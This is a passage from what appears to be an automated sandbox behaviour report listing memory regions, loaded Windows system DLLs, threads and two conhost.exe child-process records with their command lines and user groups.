Region: id = 3423 start_va = 0xaada680000 end_va = 0xaada6bffff entry_point = 0x0 region_type = private name = "private_0x000000aada680000" filename = "" Region: id = 3424 start_va = 0xaada6c0000 end_va = 0xaada6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aada6c0000" filename = "" Region: id = 3425 start_va = 0xaada6d0000 end_va = 0xaada6dffff entry_point = 0x0 region_type = private name = "private_0x000000aada6d0000" filename = "" Region: id = 3426 start_va = 0xaada6e0000 end_va = 0xaada6e6fff entry_point = 0x0 region_type = private name = "private_0x000000aada6e0000" filename = "" Region: id = 3427 start_va = 0xaada6f0000 end_va = 0xaada6f0fff entry_point = 0x0 region_type = private name = "private_0x000000aada6f0000" filename = "" Region: id = 3428 start_va = 0xaada700000 end_va = 0xaada700fff entry_point = 0x0 region_type = private name = "private_0x000000aada700000" filename = "" Region: id = 3429 start_va = 0xaada830000 end_va = 0xaada9b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aada830000" filename = "" Region: id = 3430 start_va = 0xaada9c0000 end_va = 0xaadab40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aada9c0000" filename = "" Region: id = 3431 start_va = 0xaadab50000 end_va = 0xaadbf4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aadab50000" filename = "" Region: id = 3432 start_va = 0x7ff6c4300000 end_va = 0x7ff6c43fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4300000" filename = "" Region: id = 3433 start_va = 0x7ff6c442a000 end_va = 0x7ff6c442bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c442a000" filename = "" Region: id = 3434 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3435 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3436 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3437 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3438 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3439 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3440 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3441 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3442 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3443 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3444 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3445 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4077 start_va = 0xaada720000 end_va = 0xaada72ffff entry_point = 0x0 region_type = private name = "private_0x000000aada720000" filename = "" Region: id = 4078 start_va = 0xaadbf50000 end_va = 0xaadbf8ffff entry_point = 0x0 region_type = private name = "private_0x000000aadbf50000" filename = "" Region: id = 4079 start_va = 0xaadbf90000 end_va = 0xaadc2c6fff entry_point = 0xaadbf90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4080 start_va = 0xaadc2d0000 end_va = 0xaadc4effff entry_point = 0x0 region_type = private name = "private_0x000000aadc2d0000" filename = "" Region: id = 4081 start_va = 0xaadc4f0000 end_va = 0xaadc70efff entry_point = 0x0 region_type = private name = "private_0x000000aadc4f0000" filename = "" Region: id = 4082 start_va = 0xaadc710000 end_va = 0xaadc81ffff entry_point = 0x0 region_type = private name = "private_0x000000aadc710000" filename = "" Region: id = 4083 start_va = 0xaadc820000 end_va = 0xaadca39fff entry_point = 0x0 region_type = private name = "private_0x000000aadc820000" filename = "" Region: id = 4084 start_va = 0xaadca40000 end_va = 0xaadcb51fff entry_point = 0x0 region_type = private name = "private_0x000000aadca40000" filename = "" Region: id = 4085 start_va = 0xaadcb60000 end_va = 0xaadcb9ffff entry_point = 0x0 region_type = private name = "private_0x000000aadcb60000" filename = "" Region: id = 4086 start_va = 0x7ff6c4428000 end_va = 0x7ff6c4429fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4428000" filename = "" Region: id = 4087 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4088 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4089 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4090 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4091 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4092 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4093 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4094 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4095 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 136 os_tid = 0xf2c Thread: id = 181 os_tid = 0xc60 Thread: id = 240 os_tid = 0x10c4 Thread: id = 278 os_tid = 0x1188 Process: id = "106" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf8d1000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "63" os_parent_pid = "0xdcc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2166 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2167 start_va = 0x349e8e0000 end_va = 0x349e8fffff entry_point = 0x0 region_type = private name = "private_0x000000349e8e0000" filename = "" Region: id = 2168 start_va = 0x349e900000 end_va = 0x349e913fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000349e900000" filename = "" Region: id = 2169 start_va = 0x349e920000 end_va = 0x349e95ffff entry_point = 0x0 region_type = private name = "private_0x000000349e920000" filename = "" Region: id = 2170 start_va = 0x7df5ff490000 end_va = 0x7ff5ff48ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff490000" filename = "" Region: id = 2171 start_va = 0x7ff6c3e90000 end_va = 0x7ff6c3eb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e90000" filename = "" Region: id = 2172 start_va = 0x7ff6c3eb4000 end_va = 0x7ff6c3eb4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3eb4000" filename = "" Region: id = 2173 start_va = 0x7ff6c3ebe000 end_va = 0x7ff6c3ebffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebe000" filename = "" Region: id = 2174 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2175 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2176 start_va = 0x349ea10000 end_va = 0x349eb0ffff entry_point = 0x0 region_type = private name = "private_0x000000349ea10000" filename = "" Region: id = 2177 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2178 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2505 start_va = 0x349e8e0000 end_va = 0x349e8effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000349e8e0000" filename = "" Region: id = 2506 start_va = 0x349e8f0000 end_va = 0x349e8f6fff entry_point = 0x0 region_type = private name = "private_0x000000349e8f0000" filename = "" Region: id = 2507 start_va = 0x349e960000 end_va = 0x349e99ffff entry_point = 0x0 region_type = private name = "private_0x000000349e960000" filename = "" Region: id = 2508 start_va = 0x349e9a0000 end_va = 0x349e9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000349e9a0000" filename = "" Region: id = 2509 start_va = 0x349e9b0000 end_va = 0x349e9b6fff entry_point = 0x0 region_type = private name = "private_0x000000349e9b0000" filename = "" Region: id = 2510 start_va = 0x349e9c0000 end_va = 0x349e9c0fff entry_point = 0x0 region_type = private name = "private_0x000000349e9c0000" filename = "" Region: id = 2511 start_va = 0x349e9d0000 end_va = 0x349e9d0fff entry_point = 0x0 region_type = private name = "private_0x000000349e9d0000" filename = "" Region: id = 2512 start_va = 0x349eb10000 end_va = 0x349ebcdfff entry_point = 0x349eb10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2513 start_va = 0x349ed40000 end_va = 0x349ed4ffff entry_point = 0x0 region_type = private name = "private_0x000000349ed40000" filename = "" Region: id = 2514 start_va = 0x349ed50000 end_va = 0x349eed7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000349ed50000" filename = "" Region: id = 2515 start_va = 0x349eee0000 end_va = 0x349f060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000349eee0000" filename = "" Region: id = 2516 start_va = 0x349f070000 end_va = 0x34a046ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000349f070000" filename = "" Region: id = 2517 start_va = 0x7ff6c3d90000 end_va = 0x7ff6c3e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d90000" filename = "" Region: id = 2518 start_va = 0x7ff6c3ebc000 end_va = 0x7ff6c3ebdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ebc000" filename = "" Region: id = 2519 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2520 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2521 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2522 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2523 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2524 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2525 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2526 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2527 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2528 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2529 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2530 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 137 os_tid = 0xf34 Thread: id = 182 os_tid = 0xc50 Thread: id = 203 os_tid = 0x1018 Thread: id = 266 os_tid = 0x1158 Process: id = "107" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf882000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "64" os_parent_pid = "0xdd4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2179 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2180 start_va = 0x18fbec0000 end_va = 0x18fbedffff entry_point = 0x0 region_type = private name = "private_0x00000018fbec0000" filename = "" Region: id = 2181 start_va = 0x18fbee0000 end_va = 0x18fbef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018fbee0000" filename = "" Region: id = 2182 start_va = 0x18fbf00000 end_va = 0x18fbf3ffff entry_point = 0x0 region_type = private name = "private_0x00000018fbf00000" filename = "" Region: id = 2183 start_va = 0x7df5ff6b0000 end_va = 0x7ff5ff6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6b0000" filename = "" Region: id = 2184 start_va = 0x7ff6c4580000 end_va = 0x7ff6c45a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4580000" filename = "" Region: id = 2185 start_va = 0x7ff6c45aa000 end_va = 0x7ff6c45aafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45aa000" filename = "" Region: id = 2186 start_va = 0x7ff6c45ae000 end_va = 0x7ff6c45affff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45ae000" filename = "" Region: id = 2187 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2188 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2189 start_va = 0x18fc050000 end_va = 0x18fc14ffff entry_point = 0x0 region_type = private name = "private_0x00000018fc050000" filename = "" Region: id = 2190 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2191 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3446 start_va = 0x18fbec0000 end_va = 0x18fbecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018fbec0000" filename = "" Region: id = 3447 start_va = 0x18fbed0000 end_va = 0x18fbed6fff entry_point = 0x0 region_type = private name = "private_0x00000018fbed0000" filename = "" Region: id = 3448 start_va = 0x18fbf40000 end_va = 0x18fbffdfff entry_point = 0x18fbf40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3449 start_va = 0x18fc000000 end_va = 0x18fc03ffff entry_point = 0x0 region_type = private name = "private_0x00000018fc000000" filename = "" Region: id = 3450 start_va = 0x18fc040000 end_va = 0x18fc040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018fc040000" filename = "" Region: id = 3451 start_va = 0x18fc150000 end_va = 0x18fc156fff entry_point = 0x0 region_type = private name = "private_0x00000018fc150000" filename = "" Region: id = 3452 start_va = 0x18fc160000 end_va = 0x18fc160fff entry_point = 0x0 region_type = private name = "private_0x00000018fc160000" filename = "" Region: id = 3453 start_va = 0x18fc170000 end_va = 0x18fc170fff entry_point = 0x0 region_type = private name = "private_0x00000018fc170000" filename = "" Region: id = 3454 start_va = 0x18fc250000 end_va = 0x18fc25ffff entry_point = 0x0 region_type = private name = "private_0x00000018fc250000" filename = "" Region: id = 3455 start_va = 0x18fc260000 end_va = 0x18fc3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018fc260000" filename = "" Region: id = 3456 start_va = 0x18fc3f0000 end_va = 0x18fc570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018fc3f0000" filename = "" Region: id = 3457 start_va = 0x18fc580000 end_va = 0x18fd97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000018fc580000" filename = "" Region: id = 3458 start_va = 0x7ff6c4480000 end_va = 0x7ff6c457ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4480000" filename = "" Region: id = 3459 start_va = 0x7ff6c45ac000 end_va = 0x7ff6c45adfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45ac000" filename = "" Region: id = 3460 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3461 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3462 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3463 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3464 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3465 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3466 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3467 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3468 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3469 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3470 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3471 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4096 start_va = 0x18fc180000 end_va = 0x18fc1bffff entry_point = 0x0 region_type = private name = "private_0x00000018fc180000" filename = "" Region: id = 4097 start_va = 0x18fc240000 end_va = 0x18fc24ffff entry_point = 0x0 region_type = private name = "private_0x00000018fc240000" filename = "" Region: id = 4098 start_va = 0x18fda60000 end_va = 0x18fda6ffff entry_point = 0x0 region_type = private name = "private_0x00000018fda60000" filename = "" Region: id = 4099 start_va = 0x18fda70000 end_va = 0x18fdda6fff entry_point = 0x18fda70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4100 start_va = 0x18fddb0000 end_va = 0x18fdfc5fff entry_point = 0x0 region_type = private name = "private_0x00000018fddb0000" filename = "" Region: id = 4101 start_va = 0x18fdfd0000 end_va = 0x18fe1e5fff entry_point = 0x0 region_type = private name = "private_0x00000018fdfd0000" filename = "" Region: id = 4102 start_va = 0x18fe1f0000 end_va = 0x18fe300fff entry_point = 0x0 region_type = private name = "private_0x00000018fe1f0000" filename = "" Region: id = 4103 start_va = 0x18fe310000 end_va = 0x18fe529fff entry_point = 0x0 region_type = private name = "private_0x00000018fe310000" filename = "" Region: id = 4104 start_va = 0x18fe530000 end_va = 0x18fe638fff entry_point = 0x0 region_type = private name = "private_0x00000018fe530000" filename = "" Region: id = 4105 start_va = 0x7ff6c45a8000 end_va = 0x7ff6c45a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c45a8000" filename = "" Region: id = 4106 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4107 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4108 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4109 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4110 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4111 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4112 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4113 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4114 start_va = 0x7ffc03a50000 end_va = 